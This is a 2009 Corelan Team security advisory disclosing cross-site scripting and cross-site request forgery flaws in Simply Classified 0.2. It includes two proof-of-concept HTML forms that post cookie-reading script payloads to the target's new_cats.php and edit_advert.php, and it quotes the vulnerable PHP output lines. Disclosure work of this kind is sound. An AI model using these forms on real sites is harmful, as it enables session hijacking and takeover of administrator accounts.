#################################################################
#
# Simply Classified 0.2 XSS & CSRF Vulnerabilities
# Found by: mr_me
# Tested On: Windows Vista
# Note: For educational purposes only
# Author contact date: 16th December 2009
# Advisory: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-002-simply-classifieds-v0.2-xss-and-csrf/
# Greetz to: corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team
#
#################################################################
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|         http://www.corelan.be:8800 | security@corelan.be         |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
-------------------------------------------------------------------
[+] 1st exploit:
-------------------------------------------------------------------
<form name="new_category" action="http://[server]/classified/new_cats.php" method="POST">
<table align="center" width="550" border="0" cellspacing="1" cellpadding="1">
<tr>
<input name="category"type="hidden" value="hacked" size="37" maxlength="30" />
</tr>
<tr>
<input name="description" type="hidden" value="<script>alert(document.cookie)</script>" size="40" maxlength="40" />
</tr>
<tr>
<input type="submit" name="Create" id="Create" value="Create" >
</tr>
</table>
</form>
-------------------------------------------------------------------
[+] Vulnerability details:
-------------------------------------------------------------------
The author echoes the user-controlled PHP variables $ar and $description directly into the HTML page without output encoding.
edit_cats.php - line 86:
<td align="center">Description: <input name="description" type="text" value="<?php echo "$description";?>" autocomplete="off" size="40" maxlength="40" /> </td>
</tr>
edit_adverts.php - line 120:
<td colspan="2" align="center" style="font-size:14px"><?php echo "<b>$ar</b>"; ?> </td>
In order to trigger the vulnerability, a user/admin must be tricked into clicking on a malicious URL. This would allow a hacker to execute JavaScript code in the context of the user/admin and possibly gain administrative access.
-------------------------------------------------------------------
[+] 2nd exploit:
-------------------------------------------------------------------
<form name="get_advert" action="http://[server]/classified/edit_advert.php" method="post">
<select name="advert_no" size="1">
<option value="<script>alert(document.cookie)</script>">editme :)
<input type="submit" name="Go" id="Go" value="Go" >
</form>